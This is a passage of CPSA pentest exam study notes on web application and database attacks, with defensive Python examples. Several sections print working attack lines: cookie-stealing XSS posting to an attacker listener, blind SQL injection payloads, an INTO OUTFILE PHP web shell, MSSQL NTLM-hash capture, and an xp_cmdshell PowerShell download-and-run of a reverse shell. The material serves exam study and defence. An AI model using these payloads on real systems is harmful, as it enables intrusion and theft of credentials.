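    print("safe login, real credentials:       ", safe_login(db, DEMO_USER, DEMO_PASSWORD))
```

With the formatted query the `--` turns the password clause into a comment, so any password passes; with the bound parameter the same text is simply a user name that does not exist.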

H5: Authorization Mechanisms (Permission to view/edit. Admin user vs normal user)

Common pitfalls associated with the design and implementation of application authorisation mechanisms.

This commonly happens on misconfigured web apps. E.g. a known attack on WordPress is to head to the signup page, sign up, and find that the new user can post, or even is an admin user. There is a bot attack going around which does this and then automatically redirects the website to a malicious site.

H6: Input Validation

The importance of input validation as part of a defensive coding strategy.
How input validation can be implemented and the differences between white listing, black listing and data sanitisation.

Importance

Escaping HTML special characters will decrease the risk of XSS and SQL injection attacks.
For file uploads, it is important to only allow .jpg, for example. If we allow any kind of file, attackers have an easy time uploading malicious PHP files or other code execution payloads.

Black Listing

  • Specify which file extensions are not allowed.
  • Specify what symbols are not allowed in input field, usually done via regular expressions(Regex).

If we fail to specify, everything else is allowed. White listing is recommended.

White listing

  • Specify which file extensions are allowed.
  • Specify what symbols are allowed in input field, usually done via regular expressions(Regex).

Everything else is blocked by default.

Input sanitization

Author's Note: In this context of input validation, I believe data sanitization refers to input sanitization.
Data sanitization deals with how we can securely erase data.
https://en.wikipedia.org/wiki/Data_sanitization

https://www.esecurityplanet.com/endpoint/prevent-web-attacks-using-input-sanitization/

Some places to note where we need to sanitize inputs:
- HTML output
- HTML attributes
- Javascript
- CSS
- SQL
- Cookies
- HTTP Headers
- URL GET parameters
- POST data

Depending on how the server processes data, even HTTP headers such as "User Agent" can be used for SQL injection.
More reading:
https://www.w3schools.com/php/php_form_validation.asp
https://dev.to/mrkanthaliya/validating-and-sanitizing-user-inputs-on-python-projects-rest-api-5a4
This Python snippet, using the bleach library, sanitises the input:

import bleach
# Disallowed tags such as <script> are escaped (or removed with strip=True),
# so the payload is rendered as text and never executes in the browser.
bleach.clean('<script>alert("You have been hacked")</script>')

The above Python code will prevent the XSS payload from running.
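The allow-list versus deny-list distinction, as an added Python example that is not part of the original notes: an upload-extension check written both ways, a regex allow-list for a username field, and HTML output escaping of the kind the bleach snippet performs, done here with the standard library only. The extension sets and the username rule are assumptions chosen for the example.

```python
import html
import re
from pathlib import PurePosixPath

# Allow-list of upload extensions for an image upload feature (constructed
# for this example; an application lists only what it actually needs).
ALLOWED_UPLOAD_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# Deny-list, kept here only to show why it is the weaker approach.
DENIED_UPLOAD_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".jsp"}
# Allow-list for a username field: 3 to 32 letters, digits or underscores.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")


def denylist_extension_ok(filename: str) -> bool:
    """Black-listing: whatever is not explicitly denied is allowed, so an
    extension the list forgot (.phar, .php5, .shtml, ...) slips through."""
    return PurePosixPath(filename).suffix.lower() not in DENIED_UPLOAD_EXTENSIONS


def allowlist_extension_ok(filename: str) -> bool:
    """White-listing: only the listed image extensions pass; everything else
    is rejected by default. Every suffix is checked, so double-extension
    names such as shell.php.jpg or shell.jpg.php are rejected too (the cost
    is that a dotted name like my.photo.jpg is rejected as well)."""
    if not filename or "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    return bool(suffixes) and all(s in ALLOWED_UPLOAD_EXTENSIONS for s in suffixes)


def validate_username(value: str) -> bool:
    """Regex allow-list using fullmatch(), so a trailing newline or any
    character outside the class fails the check ($ alone would not)."""
    return USERNAME_RE.fullmatch(value) is not None


def sanitize_for_html(value: str) -> str:
    """Output sanitisation for the HTML body/attribute context: the input is
    kept, but its HTML metacharacters are escaped so a script tag renders
    as text instead of executing."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    # Constructed sample file names and inputs.
    for name in ("photo.jpg", "shell.php", "shell.jpg.php", "shell.phar"):
        print(f"{name:14} deny-list: {denylist_extension_ok(name)!s:5} "
              f"allow-list: {allowlist_extension_ok(name)}")
    print(sanitize_for_html('<script>alert("You have been hacked")</script>'))
```

The deny-list accepts `shell.phar` because nobody listed it; the allow-list rejects it without anyone having to anticipate it, which is the whole argument for white-listing.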

H7: Missing from the official CREST CPSA syllabus document

SYL_CRT_CPSA_V2.0, dated 16 October 2020.

== H7 empty ==

H8: Information Disclosure in Error Messages

How error messages may indicate or disclose useful information.

Error messages will leak path information of the OS, SQL commands used to save data, what software are used, and all sorts of data.

This is the first step in Error-Based SQLi attacks.

H9: Cross-site Scripting(CSS)

Potential implications of a cross site scripting vulnerability.
Ways in which the technique can be used to benefit an attacker.

Types of XSS

https://portswigger.net/web-security/cross-site-scripting
1. Reflected
2. Stored
3. DOM-Based

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Stored XSS (also known as persistent or second-order XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

Source: Portswigger

See the Portswigger article for XSS prevention.

Implications

Attackers can use an innocent web app to launch attacks.

  • In the modern context, XSS attacks can make users of the vulnerable web server mine bitcoin or other cryptocurrencies for the attacker. This attack is called cryptojacking.
    https://www.varonis.com/blog/cryptojacking/
  • Defacement of the website is possible.
  • DoS attacks may be attempted using the users of the vulnerable web app.
  • Since the attack is launched by users of the affected web app, the real attacker's identity is hidden. Of course, the web app can trace who placed the XSS payloads, but this may take time and effort.

H10: Use of Injection Attacks

Potential implications of injection vulnerabilities:
• SQL injection
• LDAP injection
• Code injection
• XML injection

Ways in which these techniques can be used to benefit an attacker.

  • Extraction of data, hence leaking data
  • Credentials and other sensitive information may be leaked
  • Code execution can be achieved.
  • Once Code execution is achieved, it is possible to take over the server. Attackers may put in back doors, use the server as a botnet zombie, or whatever else the attacker wants.

H11: Session Handling

Common pitfalls associated with the design and implementation of session handling mechanisms.

A session is the period during which a user is using the website.
https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html

The session may manage temporary data, authentication and authorization data that the server can process.

Session Hijacking

The session of an authenticated user differs from that of an unauthenticated user. An attacker will look to obtain the session cookie data of an authenticated user.

Once we have the authenticated session cookie, it may be possible to access restricted pages by pretending to be the authenticated user.

Session Hijacking can be done through XSS as well, likely "stored XSS". A javascript code can read cookie data and send it over the web.
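An added example, in Python and not taken from the notes or the OWASP cheat sheet, of checking a session cookie against the pitfalls above: it parses a Set-Cookie header, reports the attributes that would let XSS read the cookie or let it travel over plain HTTP or cross-site, flags values that look guessable, and shows how a session ID should be generated. The two sample headers are constructed.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class CookieAudit:
    name: str
    findings: List[str] = field(default_factory=list)

    @property
    def ok(self) -> bool:
        return not self.findings


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a Set-Cookie value into (name, value, {attribute: value}).
    Attribute names are lower-cased; flag attributes map to an empty string."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        if key:
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header: str, min_len: int = 16) -> CookieAudit:
    """Flag what can be judged from the header alone: readable by script,
    sent in clear, usable cross-site, or a value too short or too regular
    to be random."""
    name, value, attrs = parse_set_cookie(header)
    audit = CookieAudit(name)
    if "httponly" not in attrs:
        audit.findings.append("missing HttpOnly: document.cookie can read it, enabling XSS hijack")
    if "secure" not in attrs:
        audit.findings.append("missing Secure: cookie is also sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        audit.findings.append("SameSite not Lax/Strict: cookie rides along on cross-site requests")
    if len(value) < min_len:
        audit.findings.append(f"value is only {len(value)} characters: likely guessable")
    if value.isdigit():
        audit.findings.append("value is numeric: looks sequential rather than random")
    return audit


def new_session_id() -> str:
    """256 bits from the OS CSPRNG, URL-safe encoded; never derived from the
    username, the time or a counter."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    # Constructed sample headers, not captured from a real site.
    samples = (
        "PHPSESSID=12345; Path=/",
        f"sid={new_session_id()}; Path=/; HttpOnly; Secure; SameSite=Lax",
    )
    for hdr in samples:
        result = audit_session_cookie(hdr)
        print(result.name, "OK" if result.ok else result.findings)
```

The HttpOnly finding is the one that matters for the stored-XSS hijack described above: with that flag set, `document.cookie` does not return the session cookie at all.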

H12: Encryption and encoding

Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes)
Identification of common SSL vulnerabilities

Common Techniques

RSA for HTTPS.
Data may be transferred as Base64-encoded strings.

Identification of Base64

We may see = or == at the end of a long string. This is padding: Base64 encodes every 3 input bytes as 4 characters, so one or two leftover bytes are padded with == or = respectively. If the input length is a multiple of 3, there are no = symbols.
An easy way to identify it is to run the string through CyberChef or the Burpsuite decoder and see if the output makes sense.

Identification of MD5

An MD5 hash is 32 hexadecimal characters (128 bits).

We can use tools like hash-identifier to help guess the Hash types
https://tools.kali.org/password-attacks/hash-identifier
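The Base64 and hash-length identification heuristics above, as an added Python example that is not from the notes or from hash-identifier: a candidate string is accepted as Base64 only if it passes the alphabet, length and decode checks and the decoded bytes are readable text, and a hex string is mapped to the algorithms whose digest has that length. The length table is an assumption of the example and, as the comment notes, only narrows the guess.

```python
import base64
import binascii
import hashlib
import re
from typing import List, Optional

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Digest length in hex characters -> algorithms that produce it. Length alone
# cannot separate MD5 from NTLM or MD4, so the result is a list of candidates
# to confirm with context (where the value came from, what format it sits in).
HASH_LENGTHS = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512"],
}


def expected_padding(plain_len: int) -> int:
    """Number of '=' characters Base64 appends for an input of plain_len bytes."""
    return (3 - plain_len % 3) % 3


def looks_like_base64(candidate: str) -> bool:
    """Alphabet, length-multiple-of-4 and strict decode checks."""
    s = candidate.strip()
    if not s or len(s) % 4 != 0 or not BASE64_RE.match(s):
        return False
    try:
        base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def try_decode_base64(candidate: str) -> Optional[str]:
    """Decode and return the text only if the result 'makes sense', i.e. is
    printable UTF-8; binary output returns None."""
    if not looks_like_base64(candidate):
        return None
    raw = base64.b64decode(candidate.strip(), validate=True)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def guess_hash_type(candidate: str) -> List[str]:
    """Candidate algorithms for a hex digest, judged by length only."""
    s = candidate.strip()
    if not HEX_RE.match(s):
        return []
    return list(HASH_LENGTHS.get(len(s), []))


if __name__ == "__main__":
    # Constructed samples: a Base64 Basic-auth style value and a known MD5.
    print(try_decode_base64("YWRtaW46cGFzc3dvcmQ="))
    print(guess_hash_type(hashlib.md5(b"password").hexdigest()))
```

The `validate=True` flag matters: without it `b64decode` silently discards characters outside the alphabet and will "decode" almost anything.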

H13: Source Code Review

Common techniques for identifying and reviewing deficiencies in the areas of security.

Code review is usually done by developers before pushing code to the production environment.
This can be done manually by an engineer and with automated tools.

Static Code analysis

https://owasp.org/www-community/Source_Code_Analysis_Tools

Many tools for code analysis.

Web Testing Techniques

I1: Website Structure Discovery

Spidering tools and their relevance in a web application test for discovering linked content.
Forced browsing techniques to discover default or unlinked content.
• Identification of functionality within client-side code

Enumeration, request analysis, path/directory discovery and subdomain discovery are covered under H1: Web Application Reconnaissance above.

Functionality

Determine functionality manually, by exercising the application ourselves.

I2: Cross-site Scripting Attacks

Arbitrary JavaScript execution.
Using Cross Site Scripting techniques to obtain sensitive information from other users.
Phishing techniques.

JS execution

Insert the following into any inputs/parameters you can find.

<script>alert("Hello World")</script>

Obtaining information from other users

The following JS script saves the cookie into the variable x and sends it to a listener.

let x = document.cookie;
// document.cookie only returns cookies without the HttpOnly flag,
// which is why session cookies should carry it
// send the cookie to an attacker's listener
const xhttp = new XMLHttpRequest();
xhttp.open("POST", "http://attackers.server/listener");
xhttp.send(x);

XSS Phishing

https://www.doyler.net/security-not-included/xss-phishing
Attackers could use JS to overlay their own HTML form into a webpage and have users login from their malicious form.

SQL Injection

Determine the existence of an SQL injection condition in a web application.
Determine the existence of a blind SQL injection condition in a web application.
Exploit SQL injection to enumerate the database and its structure.
Exploit SQL injection to execute commands on the target server.

Types of SQL injection
- Error-Based
- Blind Injection

Error-Based

Try to cause an error by supplying a single quote on an input:

'

If an error is caused, it is a possible error-based SQL injection vector.

Blind Injection (Time Based)

https://owasp.org/www-community/attacks/Blind_SQL_Injection

This type of blind SQL injection relies on the database pausing for a specified amount of time, then returning the results, indicating successful SQL query executing. Using this method, an attacker enumerates each letter of the desired piece of data using the following logic:

If the first letter of the first database’s name is an ‘A’, wait for 10 seconds.

If the first letter of the first database’s name is a ‘B’, wait for 10 seconds. etc.

Microsoft SQL Server
http://www.site.com/vulnerable.php?id=1' waitfor delay '00:00:10'--
MySQL
SELECT IF(expression, true, false)

Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the expression is True.
BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))
will execute the ENCODE function 5000000 times.

Depending on the database server’s performance and load, it should take just a moment to finish this operation. The important thing is, from the attacker’s point of view, to specify a high-enough number of BENCHMARK() function repetitions to affect the database response time in a noticeable way.

Example combination of both queries:

1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

If the database response took a long time, we may expect that the first user password character with user_id = 1 is character ‘2’.

(CHAR(50) == '2')
Using this method for the rest of characters, it’s possible to enumerate entire passwords stored in the database. This method works even when the attacker injects the SQL queries and the content of the vulnerable page doesn’t change.

Source: Blind SQL Injection, OWASP. extracted 06-Sep-2021
https://owasp.org/www-community/attacks/Blind_SQL_Injection

Exploit SQL injection to enumerate the database and its structure.

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://portswigger.net/web-security/sql-injection/cheat-sheet

MYSQL

SELECT @@version -- this will find database version
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
SELECT sleep(10) -- time delay to check for time-based blind injection possibility

Exploit SQL injection to execute commands on the target server.

Usually, we use MySQL statements to write a file onto the server, then use that malicious file to achieve code execution.

The statement below writes a PHP payload using a UNION-based injection and saves the PHP file into the web directory. This only works when the MySQL user has the FILE privilege, secure_file_priv permits writing to that path, and the path is writable and served by the web server; restricting those is the defence.

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

Source: DRD_, Null Byte - Wonder How To, 12/22/2018
https://null-byte.wonderhowto.com/how-to/use-sql-injection-run-os-commands-get-shell-0191405/

I6: Parameter Manipulation

Parameter manipulation techniques, particularly the use of client side proxies.

Parameters that could be manipulated
- Cookies
- Form Fields
- URL Query Strings
- HTTP Headers

Cookie Manipulation

Example from a real world example on a travel web site modified to protect the innocent (or stupid).
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
The attacker can simply modify the cookie to;
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
Source: https://www.cgisecurity.com/owasp/html/ch11s04.html
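The ADMIN=no cookie above is trusted by the server as-is, which is why editing it works. An added Python example, not from the notes or the cited cgisecurity page, of the usual mitigation when state must live in the cookie: the value is signed with HMAC-SHA256 under a server-side key, so a client can still read it but any edit is detected. The key, the cookie layout and the field names are constructed for the demo.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Server-side key (generated per run here; in a deployment it is loaded from
# configuration or a secret store and shared by all application servers).
SERVER_KEY = secrets.token_bytes(32)


def _tag(payload: str, key: bytes) -> str:
    """URL-safe Base64 of HMAC-SHA256(key, payload), without '=' padding."""
    mac = hmac.new(key, payload.encode("utf-8"), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode("ascii").rstrip("=")


def sign_cookie(payload: str, key: bytes = SERVER_KEY) -> str:
    """Append the tag; the cookie stays readable but cannot be altered
    without the key."""
    return payload + "." + _tag(payload, key)


def verify_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the payload if the tag matches, otherwise None (treat exactly
    like a missing cookie). compare_digest keeps the check constant-time."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = _tag(payload, key).encode("ascii")
    if not hmac.compare_digest(expected, tag.encode("utf-8")):
        return None
    return payload


def cookie_fields(payload: str) -> Dict[str, str]:
    """Parse 'k=v; k2=v2' into a dict; fields come only from a verified payload."""
    fields: Dict[str, str] = {}
    for item in payload.split(";"):
        key, _, value = item.strip().partition("=")
        if key:
            fields[key.strip()] = value.strip()
    return fields


def is_admin(cookie: str, key: bytes = SERVER_KEY) -> bool:
    """ADMIN=yes is honoured only after the signature checks out."""
    payload = verify_cookie(cookie, key)
    return payload is not None and cookie_fields(payload).get("ADMIN") == "yes"


if __name__ == "__main__":
    issued = sign_cookie("lang=en-us; ADMIN=no; y=1; time=10:30GMT")
    tampered = issued.replace("ADMIN=no", "ADMIN=yes")
    print("issued  :", issued, "-> admin:", is_admin(issued))
    print("tampered:", tampered, "-> admin:", is_admin(tampered))
```

Signing is the fallback design. The stronger option, and the one to recommend in a report, is to keep the role server-side keyed by a random session ID, so that nothing authorisation-relevant is in the cookie at all.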

Header Manipulation

We might be able to change the User-Agent or Referer values to bypass filters on the server.

Form field manipulation

Here we have a simple signup form with a hidden field that decides whether a new user is an administrative user or not. Some badly made sites have hidden form fields like this.

<form action="/signup" method="POST">
    <input type="text" id="username" name="username">
    <input type="text" id="password" name="password">
    <input name="administrator" type="hidden" value="no">
</form>

We can simply use the browser's Inspect Element tool to change the value of "administrator" to yes and submit the form. This might create a new administrative user.
We can also use Burpsuite to intercept and change the POST data.

URL Manipulation

Usually related to GET query Parameters.
If a signup is done through GET, the URL may look something like this

https://victim.server/signup?username=iamhero&password=1234&administrator=no

Simply changing the no to a yes in the URL may let us create a new administrative user.

GET parameters can hold any kind of data. It is up to the security analyst to decide how best make use of this attack vector.

Databases

J1: Microsoft SQL Server(MSSQL)

Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

Default MS-SQL System Tables
- master Database : Records all the system-level information for an instance of SQL Server.
- msdb Database : Is used by SQL Server Agent for scheduling alerts and jobs.
- model Database : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
- Resource Database : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
- tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.

mssqlclient.py

Source: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

mssqlclient.py  -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine

#Once logged in you can run queries:
SQL> select @@ version;

#Steal NTLM hash
sudo responder -I <interface> #Run that in other console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat

#Try to enable code execution
SQL> enable_xp_cmdshell

#Execute code, two syntaxes, for complex and simple cmds
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

Manual commands

SELECT name FROM master.dbo.sysdatabases #Get databases
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
sp_addsrvrolemember 'hacker', 'sysadmin'

Check out the HackTricks article for more information.
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server.

Post Exploitation

The user running the MSSQL server will usually have the SeImpersonatePrivilege token enabled.
You will probably be able to escalate to Administrator using this token: Juicy-potato

J2: Oracle RDBMS

Derivation of version and patch information from hosts running Oracle software.
Default Oracle accounts.

See: https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener

Finding version

SELECT * FROM v$version;

Patches

Listing applied patches:

[oracle@den03adm03 admin]$ $ORACLE_HOME/OPatch/opatch lspatches
30503372;OJVM PATCH SET UPDATE 11.2.0.4.200114
29938455;OCW Patch Set Update : 11.2.0.4.191015 (29938455)
30310975;DATABASE PATCH FOR EXADATA (Jan 2020 - 11.2.0.4.200114) : (30310975)

Source: https://orahow.com/check-patches-applied-in-oracle-database/

Default Oracle Accounts

https://docs.oracle.com/cd/A97630_01/win.920/a95490/username.htm
https://www.orafaq.com/wiki/List_of_default_database_users
http://www.oracle-wiki.net/premium:startdocsdefaultschemas

Oracle9i installs with a number of default accounts. Database Configuration Assistant locks and expires all default database accounts upon successful installation with the following exceptions:
- SYS
- SYSTEM
- SCOTT
- DBSNMP

Source: https://docs.oracle.com/cd/A97630_01/win.920/a95490/username.htm
This is for Oracle9i.

Latest Oracle version is Oracle Version 19C.

All databases created by the Database Configuration Assistant (DBCA) include the SYS, SYSTEM, and DBSNMP database accounts. In addition, Oracle Database provides several other administrative accounts. Before using these accounts, you must unlock them and reset their passwords.

List of users for Oracle 19c
https://docs.oracle.com/en/database/oracle/oracle-database/19/ntdbi/oracle-database-system-privileges-accounts-and-passwords.html#GUID-7513171C-1055-48BB-8C79-B27EECC9B7E9

J3: Web / App / Database Connectivity

Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications.

Common relational databases

  • MSSQL
  • MySQL
  • SQLite3
  • MS Access

Common non-relational databases

  • MongoDB
  • NoSQL

Web connections to applications.

A webapp usually will have code to login to the database.

<?php
$servername = "localhost";
$username = "username";
$password = "password";

try {
  $conn = new PDO("mysql:host=$servername;dbname=myDB", $username, $password);
  // set the PDO error mode to exception
  $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
  echo "Connected successfully";
} catch(PDOException $e) {
  echo "Connection failed: " . $e->getMessage();
}
?>

Source: W3schools, "PHP Connect to MySQL", https://www.w3schools.com/php/php_mysql_connect.asp

Regardless of programming language, connecting to the database requires some variation of the following:
- Server IP address
- database port
- username
- password
- database name

Once we have an entry into a machine, it is good to look at the web config files to find credentials for databases. The credentials could lead to privilege escalation or lateral movement, or password reuse attacks.

Common Ports for CPSA exam

Includes services covered in the technical syllabus.

Includes ports used by proprietary services such as Cisco VoIP, Solaris, Berkeley r-commands etc.

| Protocol | Port | Service | Commonly Associated OS/remarks |
| --- | --- | --- | --- |
| TCP | 22 | SSH | - |
| TCP | 23 | Telnet | - |
| UDP | 69 | TFTP | - |
| TCP | 79 | fingerd | - |
| TCP | 80 | HTTP | - |
| UDP | 123 | NTP | - |
| UDP | 161 | SNMP - SNMP Agent | - |
| UDP | 162 | SNMP - SNMP Manager | - |
| TCP | 443 | HTTPS | - |
| TCP | 500 | IPSec | Sometimes used for IKE over TCP https://www.speedguide.net/port.php?port=500 |
| UDP | 500 | IPSec Internet Key Exchange (IKE) | - |
| UDP | 4500 | IPSec NAT Traversal | - |
| TCP/UDP | 5060 | SIP for VoIP | - |
| TCP/UDP | 5061 | SIP for VoIP | - |

Berkeley R Commands

| Protocol | Port | Client | Daemon |
| --- | --- | --- | --- |
| TCP | 512 | rexec | rexecd |
| TCP | 513 | rlogin | rlogind |
| TCP | 514 | rcp | rshd |
| TCP | 514 | rsh | rshd |
| UDP | - | rstat | rstatd |
| UDP | 513 | ruptime | whod |
| UDP | 513 | rwho | whod |

Source: https://en.wikipedia.org/wiki/Berkeley_r-commands

Windows

| Protocol | Port | Service | Commonly Associated OS/remarks |
| --- | --- | --- | --- |
| TCP | 20 | FTP Default Data | - |
| TCP | 21 | FTP Control | - |
| TCP | 23 | Telnet | - |
| TCP | 25 | SMTP | - |
| TCP/UDP | 53 | DNS | - |
| TCP/UDP | 88 | Kerberos | - |
| TCP/UDP | 464 | Kerberos Password V5 | - |
| UDP | 67 | DHCP | - |
| UDP | 69 | TFTP | - |
| TCP | 110 | POP3 | - |
| TCP | 135 | RPC | - |
| TCP | 593 | RPC over HTTPS | - |
| UDP | 137 | NetBIOS Name Resolution | - |
| UDP | 138 | NetBIOS Datagram Service | - |
| TCP | 139 | NetBIOS Session Service | - |
| TCP/UDP | 389 | LDAP Server | - |
| TCP | 636 | LDAP SSL | - |
| TCP | 139,445 | SMB | - |
| TCP | 3389 | Terminal Services/Remote Desktop Protocol | - |
| TCP | 119 | NNTP | - |
| TCP | 564 | NNTP over SSL | - |
| UDP | 161 | SNMP | - |

References

For Windows: https://docs.microsoft.com/en-US/troubleshoot/windows-server/networking/service-overview-and-network-port-requirements

